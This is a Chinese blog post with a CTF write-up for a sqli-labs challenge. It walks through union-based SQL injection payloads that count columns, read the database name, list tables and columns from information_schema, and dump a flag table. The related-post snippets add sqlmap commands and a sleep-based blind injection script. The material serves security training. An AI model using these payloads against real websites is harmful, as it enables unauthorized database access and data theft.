青少年CTF平台---sqli-labs

最新推荐文章于 2024-07-25 23:12:39 发布
最新推荐文章于 2024-07-25 23:12:39 发布
阅读量463 收藏 3
点赞数
文章标签: sql 数据库 网络安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/t235336456/article/details/128109953
版权

 

题目:sqli-labs

考点sql注入

打开题目

先查找字段数(id=1' order by 3 --+)

到4的时候会返回错误信息

发现有3个字段

判断回显点(?id=-1' union select 1,2,3 --+)

 

 然后看数据库的名字(id=-1' union select 1,database(),3 --+)

 

发现数据库是(security)

查找数据库的表名(id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+)

 

看到有个flag表然后查看段名(id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='flag' --+) 

 查数据(id=-1' union select 1,group_concat(0x7e,flag),3 from security.flag --+)

得到flag

 

Ra1nning
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
二、CTF-Web-SQLi-Labs(记录CTF学习)
qq_27920699的博客
12-16 330
个人CTF学习之路
BUUCTF-sqli-labs1
Nothing-one的博客
07-16 1565
根据题目内容他让我们(请输入id作为带数值的参数 )这个为数字型注入。 这里面我用了sqlmap工具来进行解题。 在里面输入 python sqlmap.py -u +(网站名)(记住在网站名后面要加入?id=1) --dbs #获取数据库 这样我们就可以获得数据库中的名称了。 下面我们就要看数据库中的表明了。 python sqlmap.py -u +(网站名) -D 数据库名 --tables #列出表名 我们知道了表名,下面我们就要爆出字段名。 python sqlmap.py -u +(网站名)
BugKu CTFWeb):sqli-0x1 & baby lfi & baby lfi 2
Flag少侠的博客
05-10 1521
BugKu是一个由乌云知识库(wooyun.org)推出的在线漏洞靶场。乌云知识库是一个致力于收集、整理和分享互联网安全漏洞信息的社区平台。BugKu旨在提供一个实践和学习网络安全平台,供安全爱好者和渗透测试人员进行挑战和练习。它包含了各种不同类型的漏洞场景,如Web漏洞、系统漏洞、密码学等,参与者需要通过解决这些漏洞来获取Flag。
CTFshow-sqli-labs
Leo8283的博客
04-20 660
CTFshow sql-labs刷题记录 1-4 分别用’、"、’)、")闭合,通过联合查询语句union获取flag。由于当前调用的库非存放flag的库,可以用手注,通过元数据库information_schema.schemata表(查找所有库名),information_schema.tables表(查找所有表名),information_schema.columns表查找列名,获取flag最终的位置。 查询所有数据库 union select 1,group_concat(schema_name),
sqli-labs writeup
a370793934的专栏
11-26 457
第1关 union注入 有报错 字符型注入 http://localhost/sqli-labs-master/Less-1/?id=1' 输入?id=1'报错 输入?id=1 and 1=1 正常 输入?id=1 and 1=2 正常 说明非数字型,为字符型,输入结果被两个单引号' '包裹起来 输入?id=1"正常 再次确认确实是单引号包裹 http://localhost/s...
Sqli-Labs(1-10)通关笔记
weixin_54894046的博客
04-02 4469
靶场环境 buuctf的靶场 来到第一关 根据提示:提交方式GET 有报错提示 闭合方式为单引号 源码的sql语句为 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 使用?id=1传参 不要问我为啥这样写 我也不知道 依次使用?id=2,3,4,5,6.....不知道这关要干嘛QAQ 目标:得到数据库名字 表名 字段名 数据 输入?id=1'%23 原理用自己添加的单引号闭合 然后用#注释掉后面的单引号 不过#要用url编码成%
sqli-labs---第一关
2201_75556700的博客
05-10 178
4、查看这3列中哪几列会在页面显示 (由于写入id=整形数值,会出现先对应的name和password,所以这里我们构造id=字符)结果:第2,3列会显示在页面是上。7、接着查询users 表中的字段,得到了表中的字段,可以看到username,password里面的信息可能是我们想要的。8、查询users表中字段里面的信息(在这里加上id是为更好的分隔开用户名和密码),最终我们拿到了用户名和密码。6、 接着是查询该库中的表名,可能有多张表,这里有4张表,我们猜测重要数据会在users表中。
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
CTFSqli-Labs题目解析(1-11题)
a690135443的博客
06-14 1288
第一题 提示输入numeric类型的ID作为参数,尝试在url后添加?id=1查看,发现有显示。 改为?id=-1后无显示,也无报错,于是可以考虑-1空出位置后加union select爆数据。 改为?id=1'单引号报错,双引号不报错,可以推断出使用单引号闭合,加上注释之后,错误也消失了,所以可以在这个时候union select了。 然后添加order by语句,?id=1' order by 4 --+,当order by 4的时候报错,所以一共有3个字段。 然后使用unio
less-15 in sqli-labs
LYJ20010728的博客
02-17 86
Less-15 延时注入【 ’ 】 自动注入脚本 import requests import datetime MAXLENGTH = 20 url = "http://sqli-labs:8080/Less-15/" def getLengthOfDatabase(): for num in range(1,MAXLENGTH): payload = "admin' and if(length(database())=%s,sleep(2),1)#" % num
SQLi-CTF-master.zip
04-09
- CTF比赛平台如HackerOne、Pwnable等,提供了实践环境来提升SQL注入技能。 7. **CTF比赛中的应用**: - 在CTF比赛中,SQLi题目通常要求参赛者通过注入获取特定的数据,如数据库中的密码、隐藏文件路径或其他关键...
sqli-labs-php7-master.zip
04-06
SQL注入攻防演练平台——sqli-labs-php7-master》 在网络安全领域,CTF(Capture The Flag)比赛是一种常见的技术竞技形式,它旨在提升参赛者的网络安全技能,特别是对于Web安全的理解。在这个背景下,"sqli-labs...
ctf-all-in-one
01-30
ctf-all-in-one
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
SQL进阶:解锁高级特性,深化数据洞察
WayneYalejk的博客
07-24 464
掌握了SQL的基础知识后,进一步探索其高级特性将帮助您更高效地处理复杂数据,深化数据分析的广度和深度。本文将带您领略SQL的高级功能,包括窗口函数、存储过程、触发器以及高级查询技巧等,让您在数据处理的道路上更进一步。通过这两篇文章,读者可以从SQL的基础知识逐步深入到高级特性,全面掌握SQL在数据处理和分析中的强大能力。
SQL核心基础语法—快速入门MySQL
goldfish8848的博客
07-25 594
MySQL其实是DBMS软件系统,也就是说MySQL并不是一个数据库,这是很多人的误区。我们经常听到的Oracle,MySQL,微软SQL Server,都是DBMS软件系统,我们只是通过这些系统来管理和维护数据库而已,DBMS相当于用户和数据库之间的桥梁。目前有超过300种不同的DBMS系统,我们今天要学习的MySQL是关系型数据库,关系型数据库的数据存储模型很像Excel,用行和列组织数据。操作关系型的DBMS系统,大多数都是用SQL来管理数据,学会了SQL,就相当于学会了这些DBMS的核心。
spring —— 事务管理器
最新发布
firstgrass的博客
07-25 628
事务管理主要针对数据源进行操作:在数据库方面,通过 TransactionManager 事务管理器进行管理,表明一旦出现错误,该数据源的所有数据全部复原。那么数据库如何判断是否发生了错误呢?这就需要在代码方面,通过 @Transactional 注解管理相应的方法,表示一旦该方法出现错误,那么由该方法调用的数据就要执行回滚。
bugku ctf sqli-0x1题解
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战题目供参赛者解答。sqli-0x1是其中一个SQL注入题目,下面是该题目的解题思路: 1. 题目描述:sqli-0x1是一个简单的SQL注入题目,要求获取数据库中的某个表的内容。 2. 分析注入点:首先,我们需要找到注入点。可以通过在输入框中输入一些特殊字符(如'、"、;等)来尝试触发SQL注入。如果页面返回异常或者显示不正常,那么很可能存在注入点。 3. 判断注入类型:确定注入点后,我们需要判断注入类型。可以通过在输入框中输入一些测试语句(如' or 1=1--)来判断是否存在注入漏洞。如果页面返回正常,那么很可能存在注入漏洞。 4. 获取数据库信息:一旦确认存在注入漏洞,我们可以通过构造合适的SQL语句来获取数据库信息。可以使用UNION SELECT语句来获取表的列数和列名,然后使用SELECT语句获取表的内容。 5. 构造SQL语句:根据题目要求,我们需要获取某个表的内容。可以使用如下语句来获取表的内容: SELECT column_name FROM information_schema.columns WHERE table_name='表名'; SELECT * FROM 表名; 6. 获取结果:根据构造的SQL语句,将其作为输入发送给服务器,获取返回的结果。根据返回的结果,我们可以得到表的列数、列名和表的内容。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ra1nning

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值